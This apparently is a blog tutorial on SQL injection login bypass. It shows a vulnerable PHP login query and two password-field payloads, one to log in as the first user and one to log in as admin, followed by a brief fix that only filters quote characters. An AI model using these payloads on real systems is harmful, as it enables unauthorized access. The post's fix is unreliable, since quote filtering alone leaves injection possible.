Method 1
If the PHP code in the login check page is like below
<?php
$username=$_POST['username'];
$password=$_POST['password'];
mysql_query("select * from user where username='$username' and password='$password'");
?>
Then we can easily login to the system without having any username or password. Change the value of username and password so that it bypasses login check.
Put the value of username : test1
Put the value of password : test2' or '0'='0
Then the PHP code in the login check page will be changed to
<?php
$username=$_POST['username'];
$password=$_POST['password'];
mysql_query("select * from user where username='test1' and password='test2' or '0'='0");
?>
Then 0=0 will always return a true value. Then database returns the first row from the user table so we can login as the first user.
Method 2
To login as administrator then use the following code
Put the value of username : test1
Put the value of password : test2' or '0'='0' and role ='admin
Then the PHP code in the login check page will be changed to
<?php
$username=$_POST['username'];
$password=$_POST['password'];
mysql_query("select * from user where username='test1' and password='test2' or '0'='0' and role ='admin'");
?>
Then 0=0 will always return a true value and role='admin' returns rows which having role as admin, so we can login as admin.
Solution
Check the value of username and password and make sure that username and password don’t contain any single quote (‘) or double quote (“) characters.
No comments:
Post a Comment